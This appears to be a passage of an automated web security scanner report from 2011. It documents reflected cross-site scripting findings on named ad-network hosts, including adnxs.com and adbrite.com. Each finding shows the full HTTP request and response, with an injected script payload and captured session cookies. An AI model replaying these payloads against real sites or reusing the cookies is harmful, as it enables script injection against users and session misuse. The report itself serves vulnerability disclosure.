1UIybpHau0jzO5nZx7UNwc3Fcp5iybN6R1Y4JRoZKSSUbihELGr1XjgJM-yDn_T1Z38sLZJC5nnDEEYiCcbVkukitODRA_AYG_IAioGjDaP-ISMjhJsq43NtGC5w8alVd5Y3W_JVjsDeSQOTbDGWiFedYQaqonMCHOBdi8d64ncpkChEs1qKWeHlrhzJYvLK3U-X10T_mT9KtDivePIKJH6GNW46BRue32KEQLKx6RNT8qd-WiqVu80Hd_1P41FwUMGjlvQh8nhtp-zIq39ERDNVTK0IrUP-Cb_Ttx6GnOadl8nzAGhY8gq3gpxC6wpgzazfLsmMDzWYl67LQ1JPM8EK-GuiGbOzeZcMadWx6wDLtAMkQVPcBJeV_tSNAPqHn9Y96EEZ-kpDRlGoDOTjB8wgMtJHWp3U6FoQlEEosDOa2-6KjCjDtIMrxBp5mvurivaTyXBheiAjiFf5UzegIuH4PUQvF6HeYOl6yqVHlN2N9o11E9eoWE0gjO__pRMYYCNosyxH0ScxZ65NjJ8VJ6s08lUOlo3qTokJN5qzHBCHQVfE1b1R5wcKsxZf4LB5iPER8LvGXO1dAiOp7NxnU6D8mSvlFARj6k9vFL_PsqNx_NNxjUdgOuMKm6J5HDgs5y53qrZJyQVFecTwNKv5u9gz8eOfmncQzsT8YzywYTnISxIiHDXRREkq8K6_Cm8q7fOElewNe0FUGX0hxZNzX4RoxVeIITv1JR3M72AniQ6YsYfQmDHyNp520zI0HtJUF-yqs6-DDZsPbxj6Qgt5rFbggFIVrJR--A2xOt2l_LWMK7tcPGYKlDQExz7jt4XR4fyfzh6Y4d1vzmTMWcXBBW9Bwdgf7tDTwlHeQSy55kAD3G7t5jXWl2cilPuU73Pi5VvtGhRf1Bdy-tAzDWmiMKVJVbOcDmZ5ZA02huibYR0GLuxcJiSODuj1_GH4U3GxuALFLqSDArVvdqWPd1GH0CqEOJoyUsNRGCunARqHY1uoWs0abrh5VidSbzlvpfD9Bzedd0fQ1rNRAD_KliILsqERKBdpCSMMdrRB4h1pI33gcUO4C6n3gIrfyRotW5DbCfDxVHrK9OoZO1MqpMf-cD9MMeDxOsMI2HX50MkvGmhcZ7rIyyEizdkyd46QFUa8WEftR2_ranpFLDpnRWIPNGjFB85-AgYQqi3Ai0ozCyuE1PvWed1Li7rlJAMxp3uhubgLqqen5CtkmryYVTaYla4uKZOoFmK70-d6OBcdxR12uoDe_khu9L8pJ6cznlUJAYbKODyHPR4HRIlAmgaV3jBoguNFhCRsPc48rbhIrukdZcq88n7lUj82FDH58Lhzl730VWgqKvZ5Le44tUEYA8TMW7OkIBh4MsLAyfVn4fGgPUaaOfBE9jjuFfaqW11n4Z8gkLMTpxhxJkjDlSB7t0jcg9SXHexVCHumGFGU6YM9Q8y70R5LfL4BLNtWCdXTLJ8AtVcxNVvqy2ZcWAG-XpWNmIwppcdMqT-TkBX71JftijU2ptQWyE_WdHTddtiLy8MENw12owW6GlcHsm8bU3ZnaOAN1egW49z4weCLEpZILzTJU_ugwz8K5JhQ-DMDFzSxAh1-IGuEN7L1wERO08_NsneUMgmIOM-CdHdrVEKwYjsAqaPrkY0ib7YmiG6LPzAsOwDGEz0q517w5yTLXeP_QAGL2ktWSGsWvV5vNvimLfWzt63bDLkG5l0TfkVsb_CM3xVbtHIkji0PAVOv_qkrD2HBM43r-YwbWOT7PPhjZcBn; fc=xTIbWrtivElq1tUc5tWjJbVvdU6bSGa3te68hWgJRC-cCsKuP_sD1eNstKEGmgqs2CjyBHHN4B50paqel1-StJLdzlSJYnWgjgpSWPKJZqanh77CDv_Cb5k2sLKUWKhY0sNf3mqCcrIxbMgK0qZIglL8KhgM5_wQzjFfm742WtlsRj4DgPxbC0CSbEhxctH3CNlUYOl7xObpPSA_AkNKQIxazefuTbu8OVIWB1hgh0UuQ5WvHyA5163u2A0m1Vwyua7r46nuxletASYocQS1CQ; pf=iWpxAKbe6dXKyG4kI9LU0TQr6_aV_hWXTsEtRZOgJfGU4lRMcL7m1vqUsiBTZr7RMO7qqq5hFl3uSsnbrtm0AcdiicNNmmE_aI2n_-oR-aSbxFtxY6VXGMaWedmSR5_sZf2e9JPx2W0_L4Yfnte0zVeMKR4WkXgHWfiVoBwANMcKjySply9svk7Zjz1cpf4Bzb5Tt0dQE7jHQc5epS0VRkVIATW7cLC_dfDNtRc55AaPTS0-vn8aJUl_hlPyvPOOtdzUdOc0k8NWJBJOGBK9QZ-lyGHiRYTkQQvITxdIImFBY0mOsZX2h2BPTttOm1Xbc_h5HhDpjIQwIe1q44DX0AG9Q25Hr0TsSXGFhqkVSyhYOo9e-u-S9OqoU54oGyc4eKOevxUxpxyyPlhnEBc9g-hyXq1vQkw6vFA4jx6_C50EFNKdwIC6nJFecFHEvdhoGJRMajhWfp6v36qtQgLomoeO7STcnXJMYxdVzVjC-m3FgjKTWuNYEjtqCRtgViTecSMM7QYznF7B2nS665hlYvalAnAOTSVOdM3F_f9snK6TMaUUr7mVR5XLQhBYqSHioDxtZIA_eLx2S_pX-oLVM25XRL8B07irNS8qlr7ekd1rQ4U8f3BvpBt3a5uXz3WYV2KppMfhFPhtONNbwIev0vTu8RLoHZ9dIHokovwqrwnQOji_IKtCoOfkmPA2GXNZsyEfLkFse-VL4nLB3SN-v7t_hIXf4yquNhsR3qlOcolIxbr8CAsvJn7s9pVERGCv2XgylrDt9qGvfTGyLpv8A2Yde38jaUPKbpopJkL6ubTp98EvwAGJDQCxmpV8QykkAj4Q6BHLoyve-_dzLlVIAQ06eq6t9RXgewAoL0bGKZkTVz9HyqK6lzJ3KzNn4XmhjX4azvEIVOD1XypL8BZ0ZYO5D-OZkr4-zDlwdvTf-FzZ62NZ2vx0847xQd2HiPAVs-Npo0_YWtPEzUNCMo2pgn80M8Yib7rvW7WlT65pK2uB1RKuJg5FS_p7z-IismFNJmnxdDECCARlTTFrZxwoda_KzBssnjAUyi1EkYCCG0j3pThGfwq5Uq0-f6AalaoOF3KASDJInaJTcmELg2xEMdu-KSTPHDRv4T_9SdgFPrBSblm3JwjUk_JyuCwxhJUXK4jbld-yDkb4tl03dxtcWcjoFV_QwjIpyolfrSfHGfHNKI-XeEZ9qQdvn_DOZqfwEmMfhowJdCoCPDrXPF5h1_V_4ID4A02bJp1qiRkqtiXoxNNyV8n3Mw6XuEZmbbAY2KiuuMMPoqqkC11UJ3f0ilmAcq-IQaSbZrb-8189lloCC94FRBPLoiryHccxbJkdIF-ULo-MIaIFfBzk_4K1fDEHbIdULrPVeP4f9gjGzYpqhRCV1kZeWvR_-f0hYA8Lw75Zvr3cnox-DbW0vtRfJ-SLGp5Ew4CpDqVMcjykIV5WgKm8ByrHbLc1WRYSLLdTRJiHTibF2wHwHq4LSkiTl7JnHCAEbLHNUgk8FLdI5Y5GIzEH5KXeZO6VoSww8QwnzpHYjcfw3UjUUBIE5Dj73rTqmIT7eerZylEPy4vu97TRJwAWQNtkfqiEAfr4_0EU; uid=2931142961646634775; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C4%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008; rds=15093%7C15093%7C15093%7C15096%7C15085%7C15093%7C15088%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7Cundefined%7C15093; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 29-Oct-2011 02:20:17 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 02 May 2011 02:20:16 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=9099190985727552127&fpid=b6123"><script>alert(1)</script>730c7e9bf00&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

7.9. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dffab'-alert(1)-'addbfb1145 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193dffab'-alert(1)-'addbfb1145&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYAiACKAIw447n7QQQ447n7QQYAQ..; anj=Kfw))ByDuq(FJl:c9U(O<@CeVOmEXW1hL>#/*4Jn(uor=(5EBh5<W.k)Y><WiS:LOiybjU0r>wWIql]AvGq/IdS!acC(FaP$cYJ!J#h1Y$?7kmw?YIqgimiBWWi-dkyfpjFRO44ek(e!)zV^HsoI@m5(lVJ]-z44hi<@/+Gxw$#QV%Etka*a%eva$=@Au!AJSu6uj*@oO@]EL5n0EQo`R]:t/`eU_45K!c^VKH`O2$i'@`s.wMV-wH9)D=aab*.arK7xs@L$@.CbO?Kb?0ZuKR(FN+u4M#Er2:Iua<E_XvS:>yEy6m-9JBYXUm+V1/.@>oBLAQ/P^+8=*EjA[(GADvf*BbS#E1e?YTKA$'LPYDp0.fkASgZh0i(^P[N`AV7o.$d3BYa-u[VwBx:I(G/:381kcgHWoswb:=`Ku>u@Cidi%Y$u9`qSJ<7rlOS'j/U/>:p6qkC9x[=9>gzl!f)'vJRUdB!F`KgLFB[sgim_V^-4E!hC:TT[Mnnesvth<EqmD]T6X<+EXw*eL#7V._]eR7wKz#+Q<jY0)9m4.Ux(+g2x6gtKj2Uf7bK$d-7jQI=`H%cII=9QVL!LY6%gg!la[qizZ#JNdA3x'%jK#?C9j?>vs79'K>b2_7w$cAnjrNM]; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 03-May-2011 02:12:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 31-Jul-2011 02:12:10 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 02:12:10 GMT
Content-Length: 182

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193dffab'-alert(1)-'addbfb1145&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

7.10. http://admeld.adnxs.com/usersync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed4bf'-alert(1)-'94e964e747d was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matched4bf'-alert(1)-'94e964e747d HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYAiACKAIw447n7QQQ447n7QQYAQ..; anj=Kfw))ByDuq(FJl:c9U(O<@CeVOmEXW1hL>#/*4Jn(uor=(5EBh5<W.k)Y><WiS:LOiybjU0r>wWIql]AvGq/IdS!acC(FaP$cYJ!J#h1Y$?7kmw?YIqgimiBWWi-dkyfpjFRO44ek(e!)zV^HsoI@m5(lVJ]-z44hi<@/+Gxw$#QV%Etka*a%eva$=@Au!AJSu6uj*@oO@]EL5n0EQo`R]:t/`eU_45K!c^VKH`O2$i'@`s.wMV-wH9)D=aab*.arK7xs@L$@.CbO?Kb?0ZuKR(FN+u4M#Er2:Iua<E_XvS:>yEy6m-9JBYXUm+V1/.@>oBLAQ/P^+8=*EjA[(GADvf*BbS#E1e?YTKA$'LPYDp0.fkASgZh0i(^P[N`AV7o.$d3BYa-u[VwBx:I(G/:381kcgHWoswb:=`Ku>u@Cidi%Y$u9`qSJ<7rlOS'j/U/>:p6qkC9x[=9>gzl!f)'vJRUdB!F`KgLFB[sgim_V^-4E!hC:TT[Mnnesvth<EqmD]T6X<+EXw*eL#7V._]eR7wKz#+Q<jY0)9m4.Ux(+g2x6gtKj2Uf7bK$d-7jQI=`H%cII=9QVL!LY6%gg!la[qizZ#JNdA3x'%jK#?C9j?>vs79'K>b2_7w$cAnjrNM]; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 03-May-2011 02:13:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 31-Jul-2011 02:13:21 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 02:13:21 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/matched4bf'-alert(1)-'94e964e747d?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

7.11. http://ads.adbrite.com/adserver/vdi/682865 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5012f<script>alert(1)</script>20f68d8343f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/6828655012f<script>alert(1)</script>20f68d8343f?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:42:44 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/6828655012f<script>alert(1)</script>20f68d8343f

7.12. http://ads.adbrite.com/adserver/vdi/682865 [r parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The value of the r request parameter is copied into the HTML document as plain text between tags. The payload ff129<script>alert(1)</script>f0a7e8f2d2f was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /adserver/vdi/682865?d=null&r=ff129<script>alert(1)</script>f0a7e8f2d2f HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"

Response (redirected)

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:37:48 GMT
Server: XPEHb/1.0
Content-Length: 123

Unsupported URL: /adserver/vdi/ff129<script>alert(1)</script>f0a7e8f2d2fMTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY

7.13. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 698fa<script>alert(1)</script>fc949c569e7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/684339698fa<script>alert(1)</script>fc949c569e7?d=uuid%3D4d50384b-4b5e-0f67-919a-7275589c0b85 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"
Host: ads.adbrite.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:42:41 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/684339698fa<script>alert(1)</script>fc949c569e7

7.14. http://ads.adbrite.com/adserver/vdi/711384 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/711384

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 537d5<script>alert(1)</script>eba3afc9f69 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/711384537d5<script>alert(1)</script>eba3afc9f69?d=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=4tv6lf&r=http%3A%2F%2Fa.triggit.com%2Fpxabcm%3Fabid%3D HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; fq="84fok%2C1uo0%7Clkigxp"; srh="1%3Aq64FAA%3D%3D"; ut="1%3AHc3LDoMgEIXhd5k1CwZaanwbUCqmFMulEnR895Juv%2F8k54RdwHjCy7a6pTnDCJNzwxK53gmjX8qbBBkWozxqh0Em3wHvLIuckPDTniGQJsRysOyt931lSt3oQcpINjmv1qZuofPMv70SBwZGh2DT%2Bj%2BE6%2FoB"; vsd=0@2@4dbe0f3a@loadus.exelator.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:13:08 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/711384537d5<script>alert(1)</script>eba3afc9f69

7.15. http://ads.adbrite.com/adserver/vdi/711384 [r parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/711384

Issue detail

The value of the r request parameter is copied into the HTML document as plain text between tags. The payload 59a9c<script>alert(1)</script>a841d9665e9 was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /adserver/vdi/711384?d=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=4tv6lf&r=59a9c<script>alert(1)</script>a841d9665e9 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; fq="84fok%2C1uo0%7Clkigxp"; srh="1%3Aq64FAA%3D%3D"; ut="1%3AHc3LDoMgEIXhd5k1CwZaanwbUCqmFMulEnR895Juv%2F8k54RdwHjCy7a6pTnDCJNzwxK53gmjX8qbBBkWozxqh0Em3wHvLIuckPDTniGQJsRysOyt931lSt3oQcpINjmv1qZuofPMv70SBwZGh2DT%2Bj%2BE6%2FoB"; vsd=0@2@4dbe0f3a@loadus.exelator.com

Response (redirected)

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:06:50 GMT
Server: XPEHb/1.0
Content-Length: 120

Unsupported URL: /adserver/vdi/59a9c<script>alert(1)</script>a841d9665e9MTY4MzYyMDQ5eDAuMDQ5IDEzMDMwODM0NTB4NTQ0NjY5MDY4

7.16. http://ads.adbrite.com/adserver/vdi/762701 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52007<script>alert(1)</script>c5f391e0619 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/76270152007<script>alert(1)</script>c5f391e0619?d=978972DFA063000D2C0E7A380BFA1DEC HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; b="%3A%3A12ggb%2C6e73"; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@2@4dbe115c@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"

Response

